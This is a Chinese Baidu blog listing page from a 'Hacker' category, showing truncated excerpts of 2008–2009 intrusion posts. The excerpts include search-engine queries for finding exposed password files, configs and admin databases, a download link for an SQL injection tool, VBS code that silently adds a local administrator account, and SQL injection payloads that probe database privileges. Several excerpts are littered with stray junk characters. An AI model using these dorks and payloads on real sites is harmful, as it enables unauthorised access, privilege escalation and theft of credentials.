文章列表
 
您正在查看 "Hacker" 分类下的文章

2009-03-18 19:38
allintilte:foo.com     我们可以辅助"-" "+"来调整搜索的精确程度    直接搜索密码:(引号表示为精确搜索) 当然我们可以再延伸到上面的结果里进行二次搜索 "index of" htpasswd / passwd filetype:xls username password email "ws_ftp.log" "config.php" allinurl:admin mdb service filetype:pwd ....或者某个比如pcanywhere的密码后缀cif等    越来越有意思了,再来点更敏感信息 "robots.txt" "Disallow:" file
 
2009-03-18 19:38
察看基本情况: q?' * T ?|
info:xx.com 返回一些基本信息                                       =xF w 4 D9
site:xx.com 返回所有与该有关的url`````````````````````````````一般是看他的主要文件和部分目
 
2009-03-18 19:36
写给所有新手:一点学习方法总结 O> e2MT|#k
早已经习惯熬夜的我,今天,我学到很多东西,也明白很多,所以写下此文。 6 9{^Vfd;Y
JSXudz5 c
我没有师傅,也没有拜过师,只有老师,是现实生活中学校的计算机老师,并非网上找的所谓的“高手”,有人问过我,没有师傅怎么学习?难道学习技术就一定要找师傅吗?找师傅你们的条件就是技术好,无非就是多入侵
 
2008-11-01 14:44
各大数据库默认地址
编辑语:提高脚本扫描器成功率的途径之一就是多多收集整理这些路径等默认信息

/dat
 
2008-11-01 14:42

网站搜索引擎所屏蔽的目录

/robots.txt

在网址后加上/robots.txt

可以看到所隐藏的目录

 
2008-09-08 23:34

啊D注入工具 V2.32+网络工具包 V2.02 修正版


新版有什么修改:
1.数据保存保存加强了!
2.注入引优了一下!
3.CMD执行能力加强了!
4.修正了不少小BUG (太久了,我都忘了修改过什么了)!

啊D注入工具 V2.32 版 下载
http://www.d99net.net/down/DSQLTools%20%20v2.32.rar
如果你显示没有数据库文件,请下载数据库文件,不加入,是因为怕把你以前的

 
2008-09-03 20:47
VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user
 
2008-08-31 20:44
 
2008-08-30 14:38

转自 http://malbi.com.cn/article/186.htm

我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!

//看看是什么权限的
and 1=(Select IS_MEMBER(’db_owner’))
And char(124)%2BCast(IS_MEMBER(’db_owner’) as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS(’master’))
An

 
 
   
 
 
文章存档
 
     
 
最新文章评论
  

貌似没法下载
 

太好啦,非常感谢
 

炒股靠消息,提供内部股,内部信息 现在散户的消息来源99%以上来源于电视,报纸
 

还好啦
 

回复柔情似水╰つ:QQ 364253393
   
帮助中心 | 空间客服 | 投诉中心 | 空间协议
©2012 Baidu